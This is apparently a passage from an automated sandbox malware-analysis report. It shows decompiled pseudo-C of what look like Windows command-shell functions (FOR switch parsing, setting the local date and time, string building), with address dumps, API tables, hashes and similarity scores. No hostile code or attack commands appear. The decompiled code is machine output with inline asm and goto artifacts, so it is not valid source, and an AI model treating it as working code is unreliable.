															memcpy(_t192, _v148, _t200);
															_t193 = _t192 + _t200;
															_t197 = _v152 + _v152;
															memcpy(_t193,  *((intOrPtr*)(_t154[0xe] + _v132 * 4)) + 0x30, _t197);
															_t179 = _v125;
															_t206 = _t206 + 0x18;
															_t194 = _t193 + _t197;
															if(_t179 != 0) {
																_t138 = 0x22;
																 *_t194 = _t138;
																_t194 =  &(_t194[0]);
																_v125 = (_t138 & 0xffffff00 | _v144 != 0x00000000) - 0x00000001 & _t179;
															}
															_v140 = _v140 + 1;
															 *_t194 = 0;
															_t191 = _v132;
														}
													}
													goto L54;
												}
												asm("sbb eax, eax");
												_t125 = _t124 | 0x00000001;
												_t197 = 0;
												goto L37;
											}
											goto L54;
										}
										asm("sbb eax, eax");
										_t123 = _t122 | 0x00000001;
										goto L29;
										L54:
										_t191 = _t191 + 1;
										_v132 = _t191;
									} while (_t191 < _v156);
								}
								E011E0040(_t154[0xc]);
								E011E0040(_t154[2]);
								E011E0040(_t154);
								E011E5D39();
								_t105 = _v140;
							}
						}
					}
				}
				return E011E6FD0(_t105, _t154, _v8 ^ _t205, _t187, _t191, _t197);
			}













































































                                                    0x011faef0
                                                    0x011faef7
                                                    0x011faefd
                                                    0x011faeff
                                                    0x011faf08
                                                    0x011faf10
                                                    0x011faf15
                                                    0x011faf19
                                                    0x011faf1c
                                                    0x011faf1f
                                                    0x011faf22
                                                    0x011faf25
                                                    0x011faf28
                                                    0x011faf2b
                                                    0x011faf2e
                                                    0x011faf31
                                                    0x011faf34
                                                    0x011faf37
                                                    0x011faf3a
                                                    0x011faf3d
                                                    0x011faf43
                                                    0x011faf44
                                                    0x011faf45
                                                    0x011faf46
                                                    0x011faf4a
                                                    0x011faf50
                                                    0x011faf53
                                                    0x011faf56
                                                    0x011faf59
                                                    0x011faf5c
                                                    0x011faf5f
                                                    0x011faf62
                                                    0x011faf63
                                                    0x011faf64
                                                    0x011faf65
                                                    0x011faf6c
                                                    0x011faf72
                                                    0x011faf76
                                                    0x011faf78
                                                    0x011faf84
                                                    0x011faf84
                                                    0x011faf8d
                                                    0x011faf92
                                                    0x011faf9b
                                                    0x011faf9d
                                                    0x011fafa0
                                                    0x011fafa5
                                                    0x011fafaa
                                                    0x011fb2a5
                                                    0x011fb2a5
                                                    0x011fb2aa
                                                    0x011fafbe
                                                    0x011fafc1
                                                    0x011fafd1
                                                    0x00000000
                                                    0x011fafd7
                                                    0x011fafd9
                                                    0x011fafe3
                                                    0x011fafe8
                                                    0x011fafef
                                                    0x00000000
                                                    0x011faff5
                                                    0x011faff8
                                                    0x011fb007
                                                    0x011fb00d
                                                    0x011fb00d
                                                    0x011fb012
                                                    0x011fb015
                                                    0x011fb019
                                                    0x011fb01c
                                                    0x011fb01e
                                                    0x011fb01f
                                                    0x011fb01f
                                                    0x011fb025
                                                    0x00000000
                                                    0x00000000
                                                    0x011fb02a
                                                    0x011fb066
                                                    0x011fb068
                                                    0x011fb068
                                                    0x011fb071
                                                    0x011fb074
                                                    0x011fb077
                                                    0x00000000
                                                    0x011fb02c
                                                    0x011fb02c
                                                    0x011fb032
                                                    0x011fb036
                                                    0x011fb03c
                                                    0x011fb040
                                                    0x011fb043
                                                    0x011fb043
                                                    0x011fb04b
                                                    0x011fb04f
                                                    0x011fb051
                                                    0x011fb078
                                                    0x011fb078
                                                    0x011fb07a
                                                    0x011fb07c
                                                    0x011fb07c
                                                    0x011fb04f
                                                    0x011fb088
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011fb088
                                                    0x011fb08c
                                                    0x011fb08f
                                                    0x011fb092
                                                    0x011fb098
                                                    0x011fb09e
                                                    0x011fb0a4
                                                    0x011fb0ad
                                                    0x00000000
                                                    0x011fb0b3
                                                    0x011fb0b5
                                                    0x011fb0bb
                                                    0x011fb0bd
                                                    0x011fb0c2
                                                    0x011fb0c8
                                                    0x011fb0cb
                                                    0x011fb0d3
                                                    0x011fb0d6
                                                    0x011fb0d8
                                                    0x011fb0d8
                                                    0x011fb0de
                                                    0x00000000
                                                    0x00000000
                                                    0x011fb0e3
                                                    0x011fb0fa
                                                    0x011fb0fa
                                                    0x011fb0e5
                                                    0x011fb0e5
                                                    0x011fb0e9
                                                    0x011fb0ed
                                                    0x00000000
                                                    0x011fb0ef
                                                    0x011fb0ef
                                                    0x011fb0f2
                                                    0x011fb0f8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011fb0f8
                                                    0x011fb0ed
                                                    0x011fb103
                                                    0x011fb105
                                                    0x011fb10b
                                                    0x011fb110
                                                    0x011fb112
                                                    0x011fb112
                                                    0x011fb118
                                                    0x00000000
                                                    0x00000000
                                                    0x011fb11d
                                                    0x011fb134
                                                    0x011fb134
                                                    0x011fb136
                                                    0x011fb11f
                                                    0x011fb11f
                                                    0x011fb123
                                                    0x011fb127
                                                    0x00000000
                                                    0x011fb129
                                                    0x011fb129
                                                    0x011fb12c
                                                    0x011fb132
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011fb132
                                                    0x011fb127
                                                    0x011fb141
                                                    0x011fb143
                                                    0x011fb149
                                                    0x011fb14c
                                                    0x011fb14c
                                                    0x011fb14f
                                                    0x011fb152
                                                    0x011fb157
                                                    0x011fb15f
                                                    0x011fb163
                                                    0x011fb16f
                                                    0x011fb175
                                                    0x011fb183
                                                    0x011fb188
                                                    0x011fb18e
                                                    0x011fb193
                                                    0x011fb29a
                                                    0x011fb199
                                                    0x011fb19f
                                                    0x011fb1a2
                                                    0x011fb1a8
                                                    0x011fb1ae
                                                    0x011fb1b0
                                                    0x011fb1b2
                                                    0x011fb1c2
                                                    0x011fb1c4
                                                    0x011fb1c4
                                                    0x011fb1c8
                                                    0x011fb1cb
                                                    0x011fb1ce
                                                    0x011fb1d0
                                                    0x011fb1d5
                                                    0x011fb1d8
                                                    0x011fb1de
                                                    0x011fb1de
                                                    0x011fb1e4
                                                    0x011fb1e4
                                                    0x011fb1f0
                                                    0x011fb1f5
                                                    0x011fb1f9
                                                    0x011fb1fa
                                                    0x011fb1fd
                                                    0x011fb1fd
                                                    0x011fb200
                                                    0x011fb20a
                                                    0x011fb218
                                                    0x011fb220
                                                    0x011fb22b
                                                    0x011fb230
                                                    0x011fb233
                                                    0x011fb236
                                                    0x011fb23a
                                                    0x011fb23e
                                                    0x011fb23f
                                                    0x011fb242
                                                    0x011fb253
                                                    0x011fb253
                                                    0x011fb258
                                                    0x011fb25e
                                                    0x011fb261
                                                    0x011fb261
                                                    0x011fb188
                                                    0x00000000
                                                    0x011fb143
                                                    0x011fb13a
                                                    0x011fb13c
                                                    0x011fb13f
                                                    0x00000000
                                                    0x011fb13f
                                                    0x00000000
                                                    0x011fb105
                                                    0x011fb0fe
                                                    0x011fb100
                                                    0x00000000
                                                    0x011fb264
                                                    0x011fb264
                                                    0x011fb265
                                                    0x011fb268
                                                    0x011fb0c8
                                                    0x011fb277
                                                    0x011fb27f
                                                    0x011fb286
                                                    0x011fb28b
                                                    0x011fb290
                                                    0x011fb290
                                                    0x011fb0ad
                                                    0x011fafef
                                                    0x011fafd1
                                                    0x011fb2bc

                                                    APIs
                                                      • Part of subcall function 011FB4DD: free.MSVCRT(?,0000000A,00000000,?,011F35C4), ref: 011FB4FB
                                                      • Part of subcall function 011FB4DD: free.MSVCRT(?,0000000A,00000000,?,011F35C4), ref: 011FB508
                                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                                    • longjmp.MSVCRT(0120B8B8,00000001,00000000,?,00000000), ref: 011FAF84
                                                    • qsort.MSVCRT ref: 011FB007
                                                    • wcschr.MSVCRT ref: 011FB05C
                                                    • calloc.MSVCRT ref: 011FB09E
                                                    • calloc.MSVCRT ref: 011FB16F
                                                    • wcschr.MSVCRT ref: 011FB1B8
                                                    • memcpy.MSVCRT ref: 011FB20A
                                                    • memcpy.MSVCRT ref: 011FB22B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Heapcallocfreememcpywcschr$AllocProcesslongjmpqsort
                                                    • String ID: &()[]{}^=;!%'+,`~
                                                    • API String ID: 975110957-381716982
                                                    • Opcode ID: 00ce3fc47b8d2a4632742c067210552b94a09000676acfd28a0e68ab09a26601
                                                    • Instruction ID: 44fc031d226dcfa23b8310eef3ae734f204c33c83a6329ed552545e2878315ba
                                                    • Opcode Fuzzy Hash: 00ce3fc47b8d2a4632742c067210552b94a09000676acfd28a0e68ab09a26601
                                                    • Instruction Fuzzy Hash: C2C1D276A082159BEB28CFACD8447AEBBB1FF48714F15406DEA48E7341EB309D41CB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F3CC7, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 45%
                                                    			E011F3CC7(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v34;
				short _v36;
				char _v40;
				char _v72;
				char _v604;
				struct _SYSTEMTIME _v620;
				signed int _v624;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t48;
				signed int _t50;
				short* _t55;
				void* _t61;
				intOrPtr _t67;
				signed int* _t78;
				signed int _t87;
				intOrPtr* _t88;
				short* _t96;
				signed int _t101;
				intOrPtr* _t103;
				void* _t108;
				void* _t110;
				signed int _t115;
				void* _t118;
				signed int _t119;
				signed int* _t120;
				short* _t122;
				signed int _t123;
				signed int _t124;
				signed int _t127;
				void* _t128;
				void* _t129;

				_t38 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t38 ^ _t127;
				_t124 = __edx;
				_t88 = __ecx;
				if(__edx != 0) {
					_t91 =  &_v34;
					_v40 = 0x2e003a;
					_v36 =  *0x11ff81c;
					E011E1040( &_v34, 0xd, 0x11ff7fc);
					goto L10;
				} else {
					_t122 = __edx + 0x10;
					_t120 =  &_v40;
					_t110 = L"/-." - _t120;
					while(_t122 + 0x7fffffee != 0) {
						_t87 =  *(_t110 + _t120) & 0x0000ffff;
						if(_t87 == 0) {
							break;
						}
						 *_t120 = _t87;
						_t120 =  &(_t120[0]);
						_t122 = _t122 - 1;
						if(_t122 != 0) {
							continue;
						}
						L7:
						_t120 = _t120 - 2;
						L8:
						_t91 =  &_v40;
						 *_t120 = 0;
						E011E18C0( &_v40, 0x10, 0x11ff80c);
						L10:
						while(1) {
							L10:
							if(_t88 == 0 ||  *_t88 == 0) {
								_t42 =  *0x11fd540; // 0x0
								_t43 = _t42;
								if(_t43 == 0) {
									_t44 = 0x2342;
								} else {
									if(_t43 == 2) {
										_t44 = 0x4000271d;
									} else {
										_t44 = 0x4000271e;
									}
								}
								if(_t124 != 0) {
									_push(0);
									_push(0x2343);
									E011DC108(_t91);
									_t129 = _t128 + 8;
								} else {
									E011DC108(_t91, _t44, 1, 0x11ff80c);
									_t129 = _t128 + 0xc;
								}
								__imp___get_osfhandle( &_v624);
								_t128 = _t129 + 4;
								_t113 =  &_v604;
								if(E011F3B11( &_v624,  &_v604, 0, 0x104) == 0) {
									goto L58;
								} else {
									_t50 = _v624;
									if(_t50 == 0) {
										goto L58;
									}
									 *((short*)(_t127 + _t50 * 2 - 0x258)) = 0;
									_t96 =  &_v604;
									_t51 = _v604;
									if(_t51 == 0) {
										L33:
										if(E011E0178(_t51) == 0) {
											_push( &_v604);
											E011E25D9(L"%s\r\n");
											_t128 = _t128 + 8;
										}
										goto L35;
									}
									_t119 = _t51 & 0x0000ffff;
									while(_t119 != 0xa && _t119 != 0xd) {
										_t51 =  *(_t96 + 2) & 0x0000ffff;
										_t96 = _t96 + 2;
										_t119 = _t51;
										if(_t51 != 0) {
											continue;
										}
										goto L33;
									}
									_t51 = 0;
									 *_t96 = 0;
									goto L33;
								}
							} else {
								_t103 = _t88;
								_t11 = _t103 + 2; // 0x2
								_t113 = _t11;
								do {
									_t67 =  *_t103;
									_t103 = _t103 + 2;
								} while (_t67 != 0);
								_t105 = _t103 - _t113 >> 1;
								if(_t103 - _t113 >> 1 >= 0x104) {
									_push(0);
									asm("sbb esi, esi");
									_push(_t124);
									E011DC108(_t105);
									L57:
									L58:
									_t48 = 1;
									L59:
									return E011E6FD0(_t48, _t88, _v8 ^ _t127, _t113, _t122, _t124);
								}
								E011E1040( &_v604, 0x105, _t88);
								L35:
								E011E1040( &_v72, 0x10,  &_v40);
								_t115 = 0x10;
								_t55 =  &_v72;
								while( *_t55 != 0) {
									_t55 = _t55 + 2;
									_t115 = _t115 - 1;
									if(_t115 != 0) {
										continue;
									}
									break;
								}
								asm("sbb ecx, ecx");
								_t101 =  ~_t115 & 0x00000010 - _t115;
								if(_t115 == 0) {
									L48:
									_t113 =  &_v72;
									_t122 = E011DEA40( &_v604,  &_v72, 2);
									if( *_t122 == 0) {
										L61:
										_t48 = 0;
										goto L59;
									}
									GetLocalTime( &_v620);
									_t113 = _t122;
									_t91 =  &_v620;
									_push( &_v40);
									if(_t124 != 0) {
										_t61 = E011F4159( &_v620, _t113);
									} else {
										_t61 = E011F3FD4( &_v620, _t113);
									}
									if(_t61 == 0) {
										L55:
										_push(0);
										asm("sbb eax, eax");
										_push(( ~_t124 & 0x00000003) + 0x232f);
										E011DC108(_t91);
										_t128 = _t128 + 8;
										_t88 = 0;
										continue;
									} else {
										SetLocalTime( &_v620);
										if(SetLocalTime( &_v620) != 0) {
											goto L61;
										}
										if(GetLastError() == 0x522) {
											_push(0);
											_push(GetLastError());
											E011DC5A2(_t91);
											goto L57;
										}
										goto L55;
									}
								}
								_t78 =  &_v72 + _t101 * 2;
								_t118 = 0x10 - _t101;
								if(0x10 == 0) {
									L46:
									_t78 = _t78 - 2;
									L47:
									 *_t78 = 0;
									goto L48;
								}
								_t108 = 0x7ffffffe;
								_t88 = ";" - _t78;
								while(_t108 != 0) {
									_t123 =  *(_t88 + _t78) & 0x0000ffff;
									if(_t123 == 0) {
										break;
									}
									 *_t78 = _t123;
									_t108 = _t108 - 1;
									_t78 =  &(_t78[0]);
									_t118 = _t118 - 1;
									if(_t118 != 0) {
										continue;
									}
									goto L46;
								}
								if(_t118 != 0) {
									goto L47;
								}
								goto L46;
							}
						}
					}
					if(_t122 != 0) {
						goto L8;
					}
					goto L7;
				}
			}









































                                                    0x011f3cd2
                                                    0x011f3cd9
                                                    0x011f3cde
                                                    0x011f3ce0
                                                    0x011f3ce5
                                                    0x011f3d3b
                                                    0x011f3d48
                                                    0x011f3d4f
                                                    0x011f3d53
                                                    0x00000000
                                                    0x011f3ce7
                                                    0x011f3ce7
                                                    0x011f3cef
                                                    0x011f3cf4
                                                    0x011f3cf7
                                                    0x011f3d01
                                                    0x011f3d08
                                                    0x00000000
                                                    0x00000000
                                                    0x011f3d0a
                                                    0x011f3d0d
                                                    0x011f3d10
                                                    0x011f3d13
                                                    0x00000000
                                                    0x00000000
                                                    0x011f3d1b
                                                    0x011f3d1b
                                                    0x011f3d1e
                                                    0x011f3d20
                                                    0x011f3d23
                                                    0x011f3d2e
                                                    0x00000000
                                                    0x011f3d58
                                                    0x011f3d58
                                                    0x011f3d5a
                                                    0x011f3d98
                                                    0x011f3d9d
                                                    0x011f3da0
                                                    0x011f3db5
                                                    0x011f3da2
                                                    0x011f3da5
                                                    0x011f3dae
                                                    0x011f3da7
                                                    0x011f3da7
                                                    0x011f3da7
                                                    0x011f3da5
                                                    0x011f3dbc
                                                    0x011f3dd0
                                                    0x011f3dd2
                                                    0x011f3dd7
                                                    0x011f3ddc
                                                    0x011f3dbe
                                                    0x011f3dc6
                                                    0x011f3dcb
                                                    0x011f3dcb
                                                    0x011f3ded
                                                    0x011f3df3
                                                    0x011f3df6
                                                    0x011f3e05
                                                    0x00000000
                                                    0x011f3e0b
                                                    0x011f3e0b
                                                    0x011f3e13
                                                    0x00000000
                                                    0x00000000
                                                    0x011f3e1b
                                                    0x011f3e23
                                                    0x011f3e29
                                                    0x011f3e33
                                                    0x011f3e59
                                                    0x011f3e62
                                                    0x011f3e6a
                                                    0x011f3e70
                                                    0x011f3e75
                                                    0x011f3e75
                                                    0x00000000
                                                    0x011f3e62
                                                    0x011f3e35
                                                    0x011f3e38
                                                    0x011f3e44
                                                    0x011f3e48
                                                    0x011f3e4b
                                                    0x011f3e50
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f3e52
                                                    0x011f3e54
                                                    0x011f3e56
                                                    0x00000000
                                                    0x011f3e56
                                                    0x011f3d62
                                                    0x011f3d62
                                                    0x011f3d64
                                                    0x011f3d64
                                                    0x011f3d67
                                                    0x011f3d67
                                                    0x011f3d6a
                                                    0x011f3d6d
                                                    0x011f3d74
                                                    0x011f3d7c
                                                    0x011f3f94
                                                    0x011f3f96
                                                    0x011f3fa1
                                                    0x011f3fa2
                                                    0x011f3fa7
                                                    0x011f3faa
                                                    0x011f3faa
                                                    0x011f3faf
                                                    0x011f3fbf
                                                    0x011f3fbf
                                                    0x011f3d8e
                                                    0x011f3e78
                                                    0x011f3e84
                                                    0x011f3e89
                                                    0x011f3e8e
                                                    0x011f3e97
                                                    0x011f3e9d
                                                    0x011f3ea0
                                                    0x011f3ea3
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f3ea3
                                                    0x011f3eb0
                                                    0x011f3eb2
                                                    0x011f3eb6
                                                    0x011f3efe
                                                    0x011f3f00
                                                    0x011f3f0e
                                                    0x011f3f14
                                                    0x011f3fd0
                                                    0x011f3fd0
                                                    0x00000000
                                                    0x011f3fd0
                                                    0x011f3f21
                                                    0x011f3f2a
                                                    0x011f3f2c
                                                    0x011f3f32
                                                    0x011f3f35
                                                    0x011f3f3e
                                                    0x011f3f37
                                                    0x011f3f37
                                                    0x011f3f37
                                                    0x011f3f45
                                                    0x011f3f72
                                                    0x011f3f76
                                                    0x011f3f78
                                                    0x011f3f82
                                                    0x011f3f83
                                                    0x011f3f88
                                                    0x011f3f8b
                                                    0x00000000
                                                    0x011f3f47
                                                    0x011f3f4e
                                                    0x011f3f63
                                                    0x00000000
                                                    0x00000000
                                                    0x011f3f70
                                                    0x011f3fc0
                                                    0x011f3fc8
                                                    0x011f3fc9
                                                    0x00000000
                                                    0x011f3fc9
                                                    0x00000000
                                                    0x011f3f70
                                                    0x011f3f45
                                                    0x011f3ec0
                                                    0x011f3ec3
                                                    0x011f3ec5
                                                    0x011f3ef6
                                                    0x011f3ef6
                                                    0x011f3ef9
                                                    0x011f3efb
                                                    0x00000000
                                                    0x011f3efb
                                                    0x011f3ecc
                                                    0x011f3ed1
                                                    0x011f3ed7
                                                    0x011f3edb
                                                    0x011f3ee2
                                                    0x00000000
                                                    0x00000000
                                                    0x011f3ee4
                                                    0x011f3ee7
                                                    0x011f3ee8
                                                    0x011f3eeb
                                                    0x011f3eee
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f3ef0
                                                    0x011f3ef4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f3ef4
                                                    0x011f3d5a
                                                    0x011f3d58
                                                    0x011f3d19
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f3d19

                                                    APIs
                                                    • _get_osfhandle.MSVCRT ref: 011F3DED
                                                    • GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,002E003A), ref: 011F3F21
                                                    • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,002E003A,?,002E003A), ref: 011F3F4E
                                                    • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,002E003A), ref: 011F3F5B
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,002E003A), ref: 011F3F65
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,002E003A), ref: 011F3FC2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: LocalTime$ErrorLast$_get_osfhandle
                                                    • String ID: %s$/-.$:
                                                    • API String ID: 1033501010-879152773
                                                    • Opcode ID: 98d0240bf57d487f5a7b0751c0276c171fe72203a98ac5a9918e94f9acb30018
                                                    • Instruction ID: aaf4496f0f5f4ea29e44c89b40f291fba41fd36363e426528a8b77db2cf638fc
                                                    • Opcode Fuzzy Hash: 98d0240bf57d487f5a7b0751c0276c171fe72203a98ac5a9918e94f9acb30018
                                                    • Instruction Fuzzy Hash: 67812531A2022687EF2C9E78C859BEE33A5BF80304F44416CDA26D72D5EB719A46C752
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D9A26, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 212COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 50%
                                                    			E011D9A26(void* __eax) {
				void* __edi;
				intOrPtr _t31;
				signed short _t32;
				intOrPtr _t36;
				intOrPtr _t44;
				int _t47;
				intOrPtr _t52;
				void* _t60;
				void* _t70;
				void* _t79;
				void* _t80;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t91;
				void* _t94;
				signed int _t96;
				intOrPtr* _t101;

				_t96 = 0;
				__imp___wcsicmp(L"FOR/?", 0x120faa0);
				_t102 = __eax;
				if(__eax == 0) {
					 *0x120faa6 = 0;
					_t96 = 1;
				}
				_t63 = 0x2b;
				 *0x120fa8c = 0x1e;
				_t101 = E011DE9A0(_t63, _t102);
				_t31 = 0x2f;
				if(_t96 != 0) {
					 *0x120faa0 = _t31;
					_t32 = 0x3f;
					 *0x120faa2 = _t32;
					 *0x120faa4 = 0;
				} else {
					_t63 = 0;
					E011DF030(0);
				}
				_t88 = 0x2b;
				if(E011DDCE1(_t60, _t88, _t96) != 0) {
					 *(_t101 + 0x38) =  *(_t101 + 0x38) & 0x00000000;
					 *_t101 = 0x3c;
					goto L18;
				} else {
					 *(_t101 + 0x48) =  *(_t101 + 0x48) & 0x00000000;
					_t36 = 0x25;
					if( *0x1213cc9 == 0) {
						L13:
						if( *0x120faa0 != _t36) {
							L45:
							E011F82EB(_t63);
							L17:
							_push(0x120faa0);
							_push( *(_t101 + 0x38));
							_t89 = 0x1e;
							E011D9C73( *(_t101 + 0x38), _t89);
							E011D9C4D(L"IN");
							_push(0x120faa0);
							_push( *(_t101 + 0x38));
							_t90 = 0x1e;
							E011D9C73( *(_t101 + 0x38), _t90);
							 *((intOrPtr*)(_t101 + 0x3c)) = E011D9936(_t60);
							E011D9C4D(L"DO");
							_push(0x120faa0);
							_t91 = 8;
							E011E1040( *(_t101 + 0x38) + 0x2c, _t91);
							_t70 = 0x2b;
							_t44 = E011DDC74(_t60, _t70);
							 *((intOrPtr*)(_t101 + 0x40)) = _t44;
							if(_t44 == 0) {
								E011F82EB(_t70);
							}
							L18:
							return _t101;
						}
						_t47 = iswspace( *0x120faa2 & 0x0000ffff);
						_pop(_t63);
						if(_t47 != 0) {
							goto L45;
						}
						_t63 = L"=,;";
						 *(_t101 + 0x44) =  *0x120faa2 & 0x0000ffff;
						if(E011DD7D4(L"=,;",  *0x120faa2 & 0x0000ffff) != 0 ||  *0x120fa8c != 3) {
							goto L45;
						} else {
							goto L17;
						}
					} else {
						while(1) {
							__imp___wcsicmp(L"/L", 0x120faa0);
							if(_t36 == 0) {
								goto L30;
							}
							L7:
							__imp___wcsicmp(L"/D", 0x120faa0);
							if(_t36 == 0) {
								 *(_t101 + 0x48) =  *(_t101 + 0x48) | 0x00000002;
								L25:
								_t36 = E011DF030(0);
								while(1) {
									__imp___wcsicmp(L"/L", 0x120faa0);
									if(_t36 == 0) {
										goto L30;
									}
									goto L7;
								}
								goto L30;
							}
							__imp___wcsicmp(L"/F", 0x120faa0);
							if(_t36 == 0) {
								 *(_t101 + 0x48) =  *(_t101 + 0x48) | 0x00000008;
								E011DF030(0);
								_t36 =  *0x120faa0;
								_t79 = 0x25;
								__eflags = _t36 - _t79;
								if(_t36 == _t79) {
									continue;
								}
								_t80 = 0x2f;
								__eflags = _t36 - _t80;
								if(_t36 == _t80) {
									continue;
								}
								__eflags =  *((intOrPtr*)(_t101 + 0x4c));
								if( *((intOrPtr*)(_t101 + 0x4c)) != 0) {
									E011F82EB(_t80);
								}
								_t63 = 6 +  *0x120fa8c * 2;
								_t52 = E011E00B0(_t63);
								__eflags = _t52;
								if(_t52 == 0) {
									L41:
									E011F9287(_t63);
									__imp__longjmp(0x120b8b8, 1);
									L42:
									__eflags = _t63 - 6;
									if(_t63 != 6) {
										__eflags = _t63 - 4;
										if(_t63 != 4) {
											E011F82EB(_t63);
										}
									}
									L12:
									_t36 = 0x25;
									goto L13;
								} else {
									_t94 =  *0x120fa8c + 3;
									L24:
									 *((intOrPtr*)(_t101 + 0x4c)) = _t52;
									E011E1040(_t52, _t94, 0x120faa0);
									goto L25;
								}
							}
							__imp___wcsicmp(L"/R", 0x120faa0);
							_t63 =  *(_t101 + 0x48);
							if(_t36 == 0) {
								 *(_t101 + 0x48) = _t63 | 0x00000004;
								E011DF030(0);
								__eflags =  *((intOrPtr*)(_t101 + 0x4c));
								if( *((intOrPtr*)(_t101 + 0x4c)) != 0) {
									E011F82EB(0);
								}
								_t36 =  *0x120faa0;
								_t86 = 0x25;
								__eflags = _t36 - _t86;
								if(_t36 == _t86) {
									continue;
								} else {
									_t87 = 0x2f;
									__eflags = _t36 - _t87;
									if(_t36 == _t87) {
										continue;
									}
									_t63 = 2 +  *0x120fa8c * 2;
									_t52 = E011E00B0(_t63);
									__eflags = _t52;
									if(_t52 == 0) {
										goto L41;
									}
									_t94 =  *0x120fa8c + 1;
									goto L24;
								}
							}
							if(_t63 == 0 || _t63 == 8) {
								goto L12;
							} else {
								__eflags = _t63 - 2;
								if(_t63 == 2) {
									goto L12;
								}
								__eflags = _t63 - 1;
								if(_t63 == 1) {
									goto L12;
								}
								goto L42;
							}
							L30:
							 *(_t101 + 0x48) =  *(_t101 + 0x48) | 1;
							goto L25;
						}
					}
				}
			}























                                                    0x011d9a34
                                                    0x011d9a36
                                                    0x011d9a3e
                                                    0x011d9a40
                                                    0x011f1097
                                                    0x011f109d
                                                    0x011f109d
                                                    0x011d9a48
                                                    0x011d9a49
                                                    0x011d9a58
                                                    0x011d9a5c
                                                    0x011d9a5f
                                                    0x011f10a3
                                                    0x011f10ab
                                                    0x011f10ac
                                                    0x011f10b4
                                                    0x011d9a65
                                                    0x011d9a65
                                                    0x011d9a67
                                                    0x011d9a67
                                                    0x011d9a6e
                                                    0x011d9a76
                                                    0x011f10bf
                                                    0x011f10c3
                                                    0x00000000
                                                    0x011d9a7c
                                                    0x011d9a7c
                                                    0x011d9a89
                                                    0x011d9a8a
                                                    0x011d9b0a
                                                    0x011d9b11
                                                    0x011f1154
                                                    0x011f1154
                                                    0x011d9b57
                                                    0x011d9b5f
                                                    0x011d9b60
                                                    0x011d9b63
                                                    0x011d9b64
                                                    0x011d9b6e
                                                    0x011d9b76
                                                    0x011d9b77
                                                    0x011d9b7a
                                                    0x011d9b7b
                                                    0x011d9b8a
                                                    0x011d9b8d
                                                    0x011d9b95
                                                    0x011d9b9b
                                                    0x011d9b9c
                                                    0x011d9ba3
                                                    0x011d9ba4
                                                    0x011d9ba9
                                                    0x011d9bae
                                                    0x011f115e
                                                    0x011f115e
                                                    0x011d9bb5
                                                    0x011d9bb8
                                                    0x011d9bb8
                                                    0x011d9b1f
                                                    0x011d9b25
                                                    0x011d9b28
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9b35
                                                    0x011d9b3a
                                                    0x011d9b44
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9a8c
                                                    0x011d9a8f
                                                    0x011d9a99
                                                    0x011d9aa3
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9aa9
                                                    0x011d9ab3
                                                    0x011d9abd
                                                    0x011d9c3b
                                                    0x011d9c19
                                                    0x011d9c1b
                                                    0x011d9a8f
                                                    0x011d9a99
                                                    0x011d9aa3
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9aa3
                                                    0x00000000
                                                    0x011d9a8f
                                                    0x011d9acd
                                                    0x011d9ad7
                                                    0x011d9bb9
                                                    0x011d9bbf
                                                    0x011d9bc4
                                                    0x011d9bcc
                                                    0x011d9bcd
                                                    0x011d9bd0
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9bd8
                                                    0x011d9bd9
                                                    0x011d9bdc
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9be2
                                                    0x011d9be6
                                                    0x011d9c46
                                                    0x011d9c46
                                                    0x011d9bed
                                                    0x011d9bf4
